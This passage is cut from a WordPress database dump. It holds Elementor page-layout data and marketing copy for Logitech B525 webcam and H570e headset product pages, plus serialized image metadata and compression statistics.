room.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f50af12\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(5969,3021,'_wp_attached_file','2019/03/b525-pdp-2017-refresh-1.jpg'),(5970,3021,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:35:\"2019/03/b525-pdp-2017-refresh-1.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"b525-pdp-2017-refresh-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"b525-pdp-2017-refresh-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"b525-pdp-2017-refresh-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:35:\"b525-pdp-2017-refresh-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:35:\"b525-pdp-2017-refresh-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:35:\"b525-pdp-2017-refresh-1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:33:\"b525-pdp-2017-refresh-1-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5971,3021,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:7.86351512921916739884409253136254847049713134765625;s:5:\"bytes\";i:5985;s:11:\"size_before\";i:76111;s:10:\"size_after\";i:70126;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.779999999999999804600747665972448885440826416015625;s:5:\"bytes\";i:178;s:11:\"size_before\";i:4708;s:10:\"size_after\";i:4530;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.7599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:346;s:11:\"size_before\";i:6009;s:10:\"size_after\";i:5663;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.9700000000000006394884621840901672840118408203125;s:5:\"bytes\";i:2443;s:11:\"size_before\";i:24514;s:10:\"size_after\";i:22071;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.87999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:340;s:11:\"size_before\";i:5785;s:10:\"size_after\";i:5445;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.12000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:978;s:11:\"size_before\";i:13740;s:10:\"size_after\";i:12762;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.95999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:1700;s:11:\"size_before\";i:21355;s:10:\"size_after\";i:19655;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(5975,3022,'_elementor_template_type','post'),(5976,3022,'_elementor_data','[{\"id\":\"1bd07bc\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"15ffe3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7e392b1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>LOGITECH B525<\\/h2><p>Ideal for on-the-go professionals with a compact, foldable, 360\\u00b0 swivel design<\\/p><ul><li>1080p HD quality in a compact form factor<\\/li><li>Folds for grab-and-go convenience<\\/li><li>360\\u00b0 swivel so you can point in any direction<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e958b43\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ac0fc79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/b525-pdp-2017-refresh-1.png\",\"id\":3018}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"63d7c6e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0b8649a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b26633b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>PORTABLE HD VIDEO CAMERA<\\/h2><p>For on-the-go professionals, Logitech B525 HD Webcam makes it easy to bring a webcam to every meeting. The compact, folding design simplifies travel, and features a universal mounting clip for your laptop or other device. High-definition video presents clear images for every participant to see.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"212d5f9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5daecb1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"5192f45\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"51cca04\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9607670\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ca77659\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":53.871},\"elements\":[{\"id\":\"e24f4d5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/b525-pdp-2017-refresh.jpg\",\"id\":3019}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"df06a88\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":46.129,\"content_position\":\"center\"},\"elements\":[{\"id\":\"6e67ac3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>HIGH-QUALITY IMAGE AND SOUND<\\/h3><p>Image quality is important for your business meetings. The affordable B525 HD Webcam, capturing 1080p Full HD video at 30 frames per second, delivers clear images even in low-light conditions. Built-in autofocus maintains sharpness as close as 10 cm.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4ae1149\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fd54ece\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"6e59f08\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EASY TO SET UP AND USE<\\/h3><p>Plug and play to start every meeting on time. The B525 HD Webcam works with all leading video conferencing software for PC and Mac. The convenient fold-and-go design lets you pack the camera and take it with you. Just attach it to your laptop and begin your meeting.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fa57b59\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"04307b6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/b525-pdp-2017-refresh-1.jpg\",\"id\":3021}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc32e90\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"38b106e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"ba995e9\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"224e754\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c6210b3\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"77b161d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"16bd9e4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PERSONAL FIELD OF VIEW<\\/h4><p>With a 69-degree field of view, B525 captures an ideal head-and-shoulders frame for distraction-free video conferencing.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cb49e73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c56a3a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>FOLD AND GO<\\/h4><p>Perfect for road warriors, B525 folds to a compact, bag-friendly size, which also protects the lens from scuffs and scrapes.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"aa56502\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"95c4de8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>AIM AT THE ACTION<\\/h4><p>B525 swivels a full 360 degree on its mount so you can aim the camera at yourself, your customer, or anywhere in the room.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f50af12\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(5979,3009,'_edit_last','1'),(5980,3009,'_wp_page_template','template-fullwidth.php'),(5978,3008,'_elementor_version','0.4'),(5981,3009,'_hide_page_title',''),(5982,3009,'_hide_header',''),(5983,3009,'_hide_footer',''),(5984,3009,'_hide_breadcrumb',''),(5985,3009,'_cover',''),(5986,3009,'_show_excerpt',''),(5987,3009,'_wc_apply_product',''),(5988,3009,'_yoast_wpseo_content_score','30'),(5989,3009,'_elementor_edit_mode','builder'),(5990,3009,'_elementor_template_type','post'),(5991,3009,'_elementor_data','[{\"id\":\"9a6f05e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"28e274f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b6b6a8d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>LOGITECH H570E HEADSET<\\/h2><p>Comfortable, affordable, and built to last<\\/p><ul><li>Strong and light for long-term comfort<\\/li><li>Easy-to-find inline controls<\\/li><li>Clear audio at a great price<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"456d3b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0c1df44\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/h570e-headset-1.png\",\"id\":3025}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"945afd4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0ee36db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"984c380\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>AFFORDABLE CLARITY AND COMFORT<\\/h2><p>For people who make their living on the phone, a comfortable headset makes every call more productive. Stylish and durable, the Logitech H570e Headset delivers comfort day after day. It\\u2019s easy to use as well: just connect it to a PC or Mac\\u00ae through the USB cable. The H570e includes premium noise-cancelling features for crystal clear sound at an affordable price.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5017396\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7aebfce\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"36243c3\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"943fc3e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cf32abd\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f33b72a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa6f4f6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/h570e-headset.jpg\",\"id\":3026}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d6403b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b02151a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GREAT VALUE FOR GREAT FEATURES<\\/h3><p>The Logitech H570e Headset offers premium features at an affordable price. Acoustic echo cancellation, a noise-cancelling mic, and digital signal processing (DSP) block out unwanted noise for clear conversations with great sound quality. Choose H570e Mono or H570e Stereo for one or two speakers.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"10681e8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"abebb17\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3e0175a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>COMFORTABLE AND LONG-LASTING<\\/h3><p>Business people on the phone for hours will enjoy the comfort of this headset. Stylish, lightweight design and durable materials mean you can wear the H570e all day. Leatherette ear pads, plus padded headband with metal reinforcement provides strength and flexibility, with a fit that feels just right.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"feea9a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f3940fb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/h570e-headset-1.jpg\",\"id\":3027}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3c9f8a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"610f486\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"bb08b6d\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b7f2ead\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c00455\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8eb7470\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b8881c5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>REINFORCED PADDED HEADBAND<\\/h4><p>Durable and adjustable padded headband can be worn comfortably all day while metal reinforcement provides strength, flexibility, and \\u201cjust the right\\u201d fit.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2cec6a2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4746e96\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>NOISE &amp; ECHO CANCELLATION<\\/h4><p>With acoustic echo cancellation and a noise-cancelling microphone, H570e is optimized so you can hear and be heard, even in noisy workspaces.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"396fb53\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4c41396\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>NO-LOOK INLINE CONTROLS<\\/h4><p>Control the call with answer\\/end, volume up\\/down and mute buttons. A flat and flexible cable resists tangles.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dbfd459\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"890a6f0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>OPTIMIZED FOR VOICE AND MUSIC<\\/h4><p>A dynamic equalizer automatically switches between voice and music modes, delivering the best sound quality for what the user is listening to.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5992,3024,'_wp_page_template','template-fullwidth.php'),(5993,3024,'_elementor_edit_mode','builder'),(5994,3024,'_elementor_template_type','post'),(5995,3024,'_elementor_data','[{\"id\":\"9a6f05e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"28e274f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b6b6a8d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LOGITECH H570E HEADSET<\\/p><p>Comfortable, affordable, and built to last<\\/p><ul><li>Strong and light for long-term comfort<\\/li><li>Easy-to-find inline controls<\\/li><li>Clear audio at a great price<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"456d3b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0c1df44\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(5998,3025,'_wp_attached_file','2019/03/h570e-headset-1.png'),(5999,3025,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:687;s:6:\"height\";i:600;s:4:\"file\";s:27:\"2019/03/h570e-headset-1.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"h570e-headset-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"h570e-headset-1-300x262.png\";s:5:\"width\";i:300;s:6:\"height\";i:262;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:27:\"h570e-headset-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:27:\"h570e-headset-1-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:27:\"h570e-headset-1-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:25:\"h570e-headset-1-20x17.png\";s:5:\"width\";i:20;s:6:\"height\";i:17;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5997,3009,'_elementor_version','0.4'),(6000,3025,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:1.5772690386659504735433756650309078395366668701171875;s:5:\"bytes\";i:4140;s:11:\"size_before\";i:262479;s:10:\"size_after\";i:258339;s:4:\"time\";d:0.429999999999999993338661852249060757458209991455078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.1899999999999995026200849679298698902130126953125;s:5:\"bytes\";i:1677;s:11:\"size_before\";i:14991;s:10:\"size_after\";i:13314;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.36000000000000031974423109204508364200592041015625;s:5:\"bytes\";i:1712;s:11:\"size_before\";i:39251;s:10:\"size_after\";i:37539;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.229999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:294;s:11:\"size_before\";i:23866;s:10:\"size_after\";i:23572;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.66000000000000003108624468950438313186168670654296875;s:5:\"bytes\";i:457;s:11:\"size_before\";i:68929;s:10:\"size_after\";i:68472;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:115442;s:10:\"size_after\";i:115442;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}}}'),(6028,3031,'_edit_lock','1551778446:1'),(6029,3031,'_edit_last','1'),(6002,3026,'_wp_attached_file','2019/03/h570e-headset.jpg'),(6003,3026,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:25:\"2019/03/h570e-headset.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h570e-headset-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"h570e-headset-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"h570e-headset-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"h570e-headset-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"h570e-headset-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"h570e-headset-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"h570e-headset-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6004,3026,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.8994022959425702623548204428516328334808349609375;s:5:\"bytes\";i:6893;s:11:\"size_before\";i:63242;s:10:\"size_after\";i:56349;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.95999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:314;s:11:\"size_before\";i:3945;s:10:\"size_after\";i:3631;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.8300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:486;s:11:\"size_before\";i:5506;s:10:\"size_after\";i:5020;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:2519;s:11:\"size_before\";i:19678;s:10:\"size_after\";i:17159;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.9900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:474;s:11:\"size_before\";i:5271;s:10:\"size_after\";i:4797;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.1699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1171;s:11:\"size_before\";i:11513;s:10:\"size_after\";i:10342;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.1300000000000007815970093361102044582366943359375;s:5:\"bytes\";i:1929;s:11:\"size_before\";i:17329;s:10:\"size_after\";i:15400;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(6005,3027,'_wp_attached_file','2019/03/h570e-headset-1.jpg'),(6006,3027,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:27:\"2019/03/h570e-headset-1.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"h570e-headset-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"h570e-headset-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"h570e-headset-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:27:\"h570e-headset-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:27:\"h570e-headset-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:27:\"h570e-headset-1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"